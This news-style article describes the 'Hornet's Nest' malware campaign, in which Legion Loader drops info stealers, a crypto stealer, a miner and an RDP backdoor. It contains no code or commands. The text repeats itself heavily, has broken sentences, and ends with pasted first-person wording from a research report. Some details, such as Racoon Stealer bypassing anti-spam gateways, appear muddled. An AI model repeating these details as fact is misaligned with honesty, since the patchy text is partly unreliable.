Malware often arrives hand in hand with other malware. In a recent campaign discovered by researchers, a threat actor is attempting to infect as many machines as possible with a loader capable of dropping multiple malware strains. U.S. researcher They dubbed the malware as “Hornet’s Nest.” Hornet’s nest includes not only one but 6 malware variants so it is a six in one malware. A new malware campaign is targeting organizations in the U.S. and Europe with an attack that delivers a six-in-one malware. It includes info-stealing trojans, a remote backdoor, crypto-stealer, and a crypto-miner. Since there are multiple types of malware-infested in a single go, its quantity and variety have earned it a name, “Hornet Nest”. The six malware found was a mix of crypto miners, info stealers, cryptostealer, and a backdoor. The newly discovered Legion Loader infects computers with a huge quantity and variety of malware, making it a serious threat. Hornet’s Nest’ campaign delivers a variety of malware that could create a nightmare for organizations that fall victim to attacks, warn researchers. There are a number of malware strains dropped in Hornet Nest.
About the malware:
Researchers from Deep Instinct have discovered this nasty arsenal. The six malware found was a mix of crypto miners, info stealers, cryptostealer, and a backdoor. The primary payload dropper and is written in MS Visual C++ 8 and bears the signs of active modifications. It is suspected that it may have been developed by a Russian speaker as the code shows a few traces of comments and UI written in Russian. Researchers said, “Such volume and variety are uncommon in the general landscape and are highly suggestive of a dropper-for-hire campaign.” Researchers warn that owing to its destructive attack strategy, it might be a threat designed especially for enterprises. Researchers at Deep Instinct, a cybersecurity firm said, “Such volume and variety are uncommon in the general landscape and are highly suggestive of a dropper-for-hire campaign.” The Legion Loader (i.e. the Hornet Nest), is the primary payload dropper and is written in MS Visual C++ 8. As per observation, the Loader shows signs of active modifications and is most likely to be developed by a Russian speaker as the code shows a few traces of comments and UI written in Russian. The mode of distribution is currently unknown but once the Legion Loader is installed, a few PowerShell commands are run which in turn download the remaining payloads. This consists of three variations of trojan malware—two crypto stealers; and one backdoor entry providing payload.
Dissecting the six malware elements:
Vidar – Targets all sorts of personal information, including data stored in Two-Factor Authentication (2FA) software.
Predator the Thief – Steals data and can capture images using the victim’s webcam.
Racoon Stealer – Bypass Microsoft and Symantec anti-spam messaging gateways.
Crypto Stealer – A PowerShell-based cryptocurrency stealer which allows the attacker to steal from a victim’s bitcoin wallet.
Crypto Miner –Exploits the victim’s computer and its processing power to help mine cryptocurrency over a longer period.
RDP Backdoor – Provides the attacker entry into the victim’s compromised machine. This allows the attacker to execute additional attacks in the future.
Malware loaders, also called droppers, are generally defined as a type of trojan that is used to install or drop other varieties of malware. A famous example of such a trojan is SmokeLoader which was seen at the start of the year been used to further distribute GandCrab and Vidar. Returning to Legion Loader, once executed the malware will execute PowerShell commands that enable it to begin retrieving its malicious payloads. The loader will then deliver three different forms of trojan malware, all of which are available on underground forums. The first been Vidar which is at its core an information stealer mainly geared to steal personal information. The second trojan dropped is Predator the Thiefalso an information stealer but is also capable of capturing images via the infected machine’s webcam. Lastly, the third trojan dropped is Racoon Stealer which is capable of stealing passwords and cryptocurrency wallet credentials. Racoon Stealer is also widely regarded as easy to use and is incredibly customizable adding to its appeal despite the relatively new on the malware circuit. Researchers said that “Hornet Nest” is a classic example of how less sophisticated malware can be a nightmare for any organization as it employs more advanced file-less techniques and delivers a bundle of follow-up malware ranging from info-stealers and credential harvesters to crypto-miners and backdoors.
In a similar multiple trojan infection attacks, researchers from Fortinet found a sample file of a dropper that was flagged suspicious. Upon research, it was found that the new malware had the capability to drop both RevengeRAT and WSHRAT on systems running Windows OS.
The campaign isn’t exactly the most sophisticated one, but, considering all types of data that could be compromised by hackers, a multi-pronged attack of this kind can cause an awful nightmare for the security team of organizations, researchers noted.
Nevertheless, organizations can employ basic security measures to prevent falling victim to malware. They should consider applying patches and protecting open ports if they wish to go a long way to help the business run smooth. Legion Loader is a dropper, which exists to infect computers and install additional malware on them. Droppers aren’t uncommon, but Legion Loader has a particularly nasty arsenal to play with and is designed to install two to three different hardcoded malware executables out of its list of malicious code. The hornet’s nest buried within Legion Loader
The Dropper – Legion Loader:
The dropper, which since our initial prevention events has garnered the name of “Legion Loader” in various network intrusion and emerging-threats rule-sets, a name we find to be very appropriate. Legion Loader is written in MS Visual C++ 8 (very likely by a Russian speaking individual) and shows signs of being in active development. While Legion Loader features several VM/Sandbox (VMware, VBOX, etc.) and research-tool evasions (Common debuggers, SysInternals utilities, etc.), in many cases it lacks string obfuscation which allows for fairly straightforward analysis. Every dropper in the campaign, which is simultaneously targeted at both the United States and Europe, is intended to deliver 2-3 additional malware executables and features a built-in file-less crypto-currency stealer and browser-credential harvester. Once Legion Loader is running, it initially checks-in with its designated C&C server (the servers are rotated frequently, alongside the distributed droppers) and will terminate unless it receives an expected response.